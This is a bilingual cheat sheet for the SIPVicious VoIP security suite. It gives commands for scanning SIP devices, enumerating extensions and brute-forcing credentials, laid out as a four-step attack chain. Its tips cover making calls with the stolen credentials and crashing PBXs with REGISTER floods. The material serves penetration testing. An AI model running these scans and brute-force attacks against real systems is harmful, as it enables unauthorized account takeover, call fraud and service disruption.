sipvicious

Suite de tests de sécurité SIP (VoIP). Scanne les périphériques SIP, énumère les extensions, brute-force les identifiants d'authentification, et sonde l'infrastructure SIP à la recherche de vulnérabilités. SIP (VoIP) security testing suite. Scans for SIP devices, enumerates extensions, brute-forces authentication credentials, and probes SIP infrastructure for vulnerabilities.

↗ https://github.com/EnableSecurity/sipvicious

Overview

SIPVicious is a suite of tools for testing SIP (Session Initiation Protocol) infrastructure. It includes scanners for device discovery, extension enumeration, and credential brute-forcing — covering the full attack chain against VoIP systems.

Installation

pip3 install sipvicious
# or
git clone https://github.com/EnableSecurity/sipvicious
cd sipvicious
pip3 install .

svmap — SIP Scanner

Scan for SIP devices on a network

svmap 192.168.1.0/24

Scan specific port range

svmap 192.168.1.0/24 -p 5060-5080
# Use specific SIP method
svmap 192.168.1.0/24 --method OPTIONS
svmap 192.168.1.0/24 --method REGISTER

Verbose with response details

svmap 10.10.10.0/24 -v

svwar — Extension Enumerator

Enumerate extensions 100-999

svwar -e100-999 10.10.10.1

Extension wordlist

svwar -d extensions.txt 10.10.10.1

Use REGISTER method

svwar -e100-999 10.10.10.1 --method REGISTER

Save results

svwar -e100-999 10.10.10.1 -o extensions.csv

Set custom user agent

svwar -e200-300 10.10.10.1 -n "Cisco SIP Phone/2.0"

svcrack — Credential Brute-forcer

Brute-force a single extension

svcrack -u 200 -d /usr/share/wordlists/rockyou.txt 10.10.10.1

Brute-force all discovered extensions

svcrack -u extensions.csv -d passwords.txt 10.10.10.1

Set domain

svcrack -u 200 -d passwords.txt 10.10.10.1 --domain sip.target.com

With realm

svcrack -u 200 -d passwords.txt 10.10.10.1 -r asterisk

svreport — Results Manager

List previous scan sessions

svreport list
# Export session results
svreport export -t csv -s svmap-session > ips.csv
svreport export -t txt -s svwar-session > extensions.txt

Show session info

svreport show -s svwar-session

Complete Attack Chain

Step 1: Discover SIP servers

svmap 10.10.10.0/24 -p 5060

Step 2: Enumerate extensions

svwar -e100-9999 10.10.10.1

Step 3: Export extension list

svreport export -t txt -s svwar0 > extensions.txt

Step 4: Crack credentials

svcrack -u extensions.txt -d /usr/share/wordlists/rockyou.txt 10.10.10.1

Tips

  • SIP runs on UDP/5060 by default — some PBXes use TCP or alternate ports
  • Common default credentials: extension number as both username and password
  • After cracking, use Linphone or Zoiper to make calls with stolen credentials
  • SIP REGISTER floods can crash vulnerable PBX systems
  • Asterisk default realm is “asterisk” — try it with --realm asterisk
Help / Man page
svmap [options] targets
  -p PORT     Port (default: 5060)
  -m METHOD   SIP method (OPTIONS, REGISTER, INVITE)
  -v          Verbose

svwar [options] target
  -e RANGE    Extension range (100-999)
  -d FILE     Dictionary file
  -m METHOD   SIP method

svcrack [options] target
  -u USER     Username or file
  -d FILE     Password list
  --domain D  SIP domain
  -r REALM    Authentication realm

Vue d’ensemble

SIPVicious est une suite d’outils pour tester l’infrastructure SIP (Session Initiation Protocol). Elle inclut des scanners pour la découverte de périphériques, l’énumération d’extensions, et le brute-force d’identifiants : couvrant toute la chaîne d’attaque contre les systèmes VoIP.

Installation

pip3 install sipvicious
# ou
git clone https://github.com/EnableSecurity/sipvicious
cd sipvicious
pip3 install .

svmap : scanner SIP

# Scanner les périphériques SIP sur un réseau
svmap 192.168.1.0/24

# Scanner une plage de ports spécifique
svmap 192.168.1.0/24 -p 5060-5080

# Utiliser une méthode SIP spécifique
svmap 192.168.1.0/24 --method OPTIONS
svmap 192.168.1.0/24 --method REGISTER

# Verbeux avec détails de réponse
svmap 10.10.10.0/24 -v

svwar : énumérateur d’extensions

# Énumérer les extensions 100-999
svwar -e100-999 10.10.10.1

# Wordlist d'extensions
svwar -d extensions.txt 10.10.10.1

# Utiliser la méthode REGISTER
svwar -e100-999 10.10.10.1 --method REGISTER

# Sauvegarder les résultats
svwar -e100-999 10.10.10.1 -o extensions.csv

# Définir un user agent personnalisé
svwar -e200-300 10.10.10.1 -n "Cisco SIP Phone/2.0"

svcrack : brute-force d’identifiants

# Brute-forcer une seule extension
svcrack -u 200 -d /usr/share/wordlists/rockyou.txt 10.10.10.1

# Brute-forcer toutes les extensions découvertes
svcrack -u extensions.csv -d passwords.txt 10.10.10.1

# Définir le domaine
svcrack -u 200 -d passwords.txt 10.10.10.1 --domain sip.target.com

# Avec un realm
svcrack -u 200 -d passwords.txt 10.10.10.1 -r asterisk

svreport : gestionnaire de résultats

# Lister les sessions de scan précédentes
svreport list

# Exporter les résultats d'une session
svreport export -t csv -s svmap-session > ips.csv
svreport export -t txt -s svwar-session > extensions.txt

# Afficher les infos d'une session
svreport show -s svwar-session

Chaîne d’attaque complète

# Étape 1 : découvrir les serveurs SIP
svmap 10.10.10.0/24 -p 5060

# Étape 2 : énumérer les extensions
svwar -e100-9999 10.10.10.1

# Étape 3 : exporter la liste d'extensions
svreport export -t txt -s svwar0 > extensions.txt

# Étape 4 : cracker les identifiants
svcrack -u extensions.txt -d /usr/share/wordlists/rockyou.txt 10.10.10.1

Conseils

  • SIP tourne sur UDP/5060 par défaut : certains PBX utilisent TCP ou des ports alternatifs
  • Identifiants par défaut courants : le numéro d’extension comme nom d’utilisateur et mot de passe
  • Après le crack, utiliser Linphone ou Zoiper pour passer des appels avec les identifiants dérobés
  • Les floods SIP REGISTER peuvent faire planter des PBX vulnérables
  • Le realm par défaut d’Asterisk est “asterisk” : essayer avec --realm asterisk
Aide / Page de manuel
svmap [options] targets
  -p PORT     Port (default: 5060)
  -m METHOD   SIP method (OPTIONS, REGISTER, INVITE)
  -v          Verbose

svwar [options] target
  -e RANGE    Extension range (100-999)
  -d FILE     Dictionary file
  -m METHOD   SIP method

svcrack [options] target
  -u USER     Username or file
  -d FILE     Password list
  --domain D  SIP domain
  -r REALM    Authentication realm